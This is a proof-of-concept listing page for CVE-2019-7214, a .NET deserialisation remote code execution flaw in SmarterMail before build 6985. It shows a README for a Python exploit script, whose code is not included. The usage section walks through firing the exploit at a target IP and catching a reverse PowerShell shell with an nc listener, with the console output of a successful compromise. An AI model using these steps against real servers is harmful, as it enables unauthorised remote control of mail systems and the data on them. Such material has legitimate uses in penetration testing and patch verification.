CVE-2019-7214 PoC — SmarterTools SmarterMail 代码问题漏洞

Source

Associated Vulnerability

Description

Python3 Rewrite of SmarterMail < Build 6985 Remote Code Execution found by 1F98D (CVE-2019-7214)

Readme

## CVE-2019-7214
```
# Exploit Title: SmarterMail < Build 6985 Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Modified Author: Drew Alleman
# Date: 10 May 2020
# Vendor Hompage: https://www.smartertools.com/
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
# 
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
```

## Usage
### Sending the Exploit
```
$ python3 CVE-2019-7214.py -l 192.168.45.215 -r  192.168.111.65
[*] Attacking: tcp://192.168.111.65:17001/Servers
[*] Attempting to send exploit...
[*] Exploit sent! Check your shell at 192.168.45.215:4444
```

### Creating the Listener
NOTE: You will have to press enter once you see the `connect to xxx` message to actually start the shell. 
```
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.111.65] 49788

PS C:\Windows\system32> 
```

File Snapshot

 [4.0K]  /data/pocs/32e446d9ec8147f469eec739f2213add5f5c96dd
├── [9.3K]  CVE-2019-7214.py
└── [1.0K]  README.md

0 directories, 2 files

Remarks